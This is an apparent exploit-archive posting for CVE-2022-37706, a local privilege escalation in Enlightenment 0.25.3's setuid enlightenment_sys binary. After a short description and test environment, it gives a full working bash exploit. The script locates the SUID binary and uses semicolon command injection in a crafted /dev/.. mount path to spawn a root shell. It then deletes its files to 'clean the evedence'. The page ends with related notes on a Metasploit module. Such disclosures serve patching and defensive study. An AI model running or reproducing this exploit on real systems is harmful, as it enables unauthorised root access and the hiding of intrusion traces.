Headline
Enlightenment 0.25.3 Privilege Escalation
Enlightenment version 0.25.3 suffers from a local privilege escalation vulnerability.
## Title: Enlightenment Version: 0.25.3 LPE## Author: nu11secur1ty## Date: 12.26.2022## Vendor: https://www.enlightenment.org/## Software: https://www.enlightenment.org/download## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706## Description:The Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation.Enlightenment_sys in Enlightenment before 0.25.4 allows local users togain privileges because it is setuid root,and the system library function mishandles pathnames that begin with a/dev/.. substringIf the attacker has access locally to some machine on which themachine is installed Enlightenmenthe can use this vulnerability to do very dangerous stuff.## STATUS: CRITICAL Vulnerability## Tested on:```bashDISTRIB_ID=UbuntuDISTRIB_RELEASE=22.10DISTRIB_CODENAME=kineticDISTRIB_DESCRIPTION="Ubuntu 22.10"PRETTY_NAME="Ubuntu 22.10"NAME="Ubuntu"VERSION_ID="22.10"VERSION="22.10 (Kinetic Kudu)"VERSION_CODENAME=kineticID=ubuntuID_LIKE=debianHOME_URL="https://www.ubuntu.com/"SUPPORT_URL="https://help.ubuntu.com/"BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"UBUNTU_CODENAME=kineticLOGO=ubuntu-logo```[+] Exploit:```bash#!/usr/bin/bash# Idea by MaherAzzouz# Development by nu11secur1tyecho "CVE-2022-37706"echo "[*] Trying to find the vulnerable SUID file..."echo "[*] This may take few seconds..."# The actual problemfile=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)if [[ -z ${file} ]]then echo "[-] Couldn't find the vulnerable SUID file..." echo "[*] Enlightenment should be installed on your system." exit 1fiecho "[+] Vulnerable SUID binary found!"echo "[+] Trying to pop a root shell!"mkdir -p /tmp/netmkdir -p "/dev/../tmp/;/tmp/exploit"echo "/bin/sh" > /tmp/exploitchmod a+x /tmp/exploitecho "[+] Welcome to the rabbit hole :)"${file} /bin/mount -onoexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u),"/dev/../tmp/;/tmp/exploit" /tmp///netread -p "Press any key to clean the evedence..."echo -e "Please wait... "sleep 5rm -rf /tmp/exploitrm -rf /tmp/netecho -e "Done; Everything is clear ;)"```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)## Proof and Exploit:[href](https://streamable.com/zflbgg)## Time spent`01:00:00`Related news
CVE-2022-37706: GitHub - MaherAzzouzi/CVE-2022-37706-LPE-exploit: A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04)
enlightenment_sys in Enlightenment before 0.25.4 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring.
Ubuntu 22.04.1 X64 Desktop Enlightenment 0.25.3-1 Privilege Escalation
This Metasploit module exploits a command injection within Enlightenment's enlightenment_sys binary. This is done by calling the mount command and feeding it paths which meet all of the system requirements, but execute a specific path as well due to a semi-colon being used. This module was tested on Ubuntu 22.04.1 X64 Desktop with enlightenment 0.25.3-1 (current at module write time).